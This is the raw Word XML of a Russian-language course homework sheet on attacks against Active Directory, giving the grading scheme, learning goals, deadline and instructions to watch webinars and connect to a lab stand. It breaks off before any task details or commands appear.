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240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Д</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">омашнее задание</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="881"/>
        <w:tblW w:w="9000" w:type="dxa"/>
        <w:tblInd w:w="-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blPrEx/>
        <w:trPr>
          <w:cantSplit w:val="false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Дисциплина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rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="202124"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">«</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Защита компьютерных сетей и систем</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="202124"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">»‎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Тема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Тема 26. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="202124"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">«</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Атаки на Active Directory</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="202124"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">»‎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cantSplit w:val="false"/>
          <w:trHeight w:val="510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Форма проверки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rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
                <w:color w:val="1d1c1d"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
                <w:color w:val="1d1c1d"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Проверка преподавателем. Отчёт в свободной форме.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
                <w:color w:val="1d1c1d"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
                <w:color w:val="1d1c1d"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx/>
        <w:trPr>
          <w:cantSplit w:val="false"/>
          <w:trHeight w:val="484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Имя преподавателя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Денис Бубнов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cantSplit w:val="false"/>
          <w:trHeight w:val="484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Время выполнения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180 минут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cantSplit w:val="false"/>
          <w:trHeight w:val="484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Цель задания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Научиться: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pStyle w:val="879"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:widowControl w:val="off"/>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:u w:val="none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выполнять настройки доменной инфраструктуры на базе Windows Server 2016;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="879"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:widowControl w:val="off"/>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:u w:val="none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выполнять атаки на доменную инфраструктуру.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:u w:val="none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Инструменты для выполнения ДЗ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before="200"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компьютер, доступ в интернет, доступ к лабораторному стенду.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Правила приёма работы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firstLine="0"/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1. выполненная работа на лабораторном стенде в соответствии с распределённым вариантом.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ind w:left="0" w:firstLine="0"/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2.  ссылка в ЛМС на файл с отчётом.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Критерии оценки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  <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Задание оценивается в 10 баллов, в т. ч.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b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- выполнение задания 1 </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1 балл;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- выполнение задания 2 </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1 балл;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- выполнение задания 3 </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1 балл;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- выполнение задания 4 </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1 балл;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- выполнение задания 5 </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0,5 баллов;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- выполнение задания 6 </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1 балл;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- выполнение задания 7 </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0,5 баллов;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- выполнение задания 8 </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1 балл;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shd w:val="clear" w:color="auto" w:fill="ffffff"/>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:highlight w:val="none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- выполнение задания 9 </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1 балл;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:highlight w:val="whit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roxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">д</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">ополнительные 2 балла </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">за задние можно получить </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">за </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">оформление, развернутость</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> представления результатов в отчете</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:eastAsia="Liberation Sans" w:cs="Liberation Sans"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:eastAsia="Liberation Sans" w:cs="Liberation Sans"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">самостоятельную подготовку стенда</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:eastAsia="Liberation Sans" w:cs="Liberation Sans"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">, нестандартный</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:eastAsia="Liberation Sans" w:cs="Liberation Sans"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> подход к выполнению задания</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:highlight w:val="white"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tl w:val="0"/>
              </w:rPr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  <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Задание считается выполненным, если:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b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- представлена ссылка на файл с отчётом в свободной форме в соответствии с распределённым вариантом,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- выполнены все части задания.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  <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Задание не выполнено, если:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b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- файл с отчётом не представлен,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  <w:highlight w:val="yellow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- работа содержит существенные ошибки. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:highlight w:val="yellow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Дедлайн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i/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3 недели после вебинара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</w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:keepLines/>
        <w:keepNext/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:before="220" w:after="220" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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0" w:name="_heading=h.e1wlqztb2ntp"/>
      <w:r/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Описание задания</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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left"/>
        <w:keepLines/>
        <w:keepNext/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:before="360" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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1" w:name="_heading=h.jgtuumree8hh"/>
      <w:r/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"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 xml:space="preserve">Прежде чем выполнять задание </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:keepLines/>
        <w:keepNext/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:before="360" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:widowControl/>
        <w:rPr>
          <w:u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2" w:name="_heading=h.mmstvqk41x5q"/>
      <w:r/>
      <w:bookmarkEnd w:id="2"/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Посмотрите запись вебинара по теме 26 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="202124"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">«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Атаки на Active Directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="202124"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">»‎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="202124"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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и запись практического вебинара «тема 26. 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Практика, демонстрация лабораторного стенда».</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:keepLines/>
        <w:keepNext/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u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3" w:name="_heading=h.aaczl07nqcrd"/>
      <w:r/>
      <w:bookmarkEnd w:id="3"/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Необходимо подключиться к лабораторному стенду и ввести учетную запись согласно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:hyperlink r:id="rId10" w:tooltip="https://netospace.ru/drive/d/s/11Jgbp9VIVQO5rI1ZhAQyFVoLWLE7Nnd/DjOP304ZZoLG9_luPhxbanilKuwlgJv2-ZL_ADDso5Qs" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="877"/>
            <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">таблице.</w:t>
        </w:r>
      </w:hyperlink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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:keepLines/>
        <w:keepNext/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:before="360" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova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4" w:name="_heading=h.te78rpufdc0v"/>
      <w:r/>
      <w:bookmarkEnd w:id="4"/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Подключение к стендам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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:keepLines/>
        <w:keepNext/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:before="360" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u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5" w:name="_heading=h.b10hlmaymlpb"/>
      <w:r/>
      <w:bookmarkEnd w:id="5"/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Учётные записи для операционных систем:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
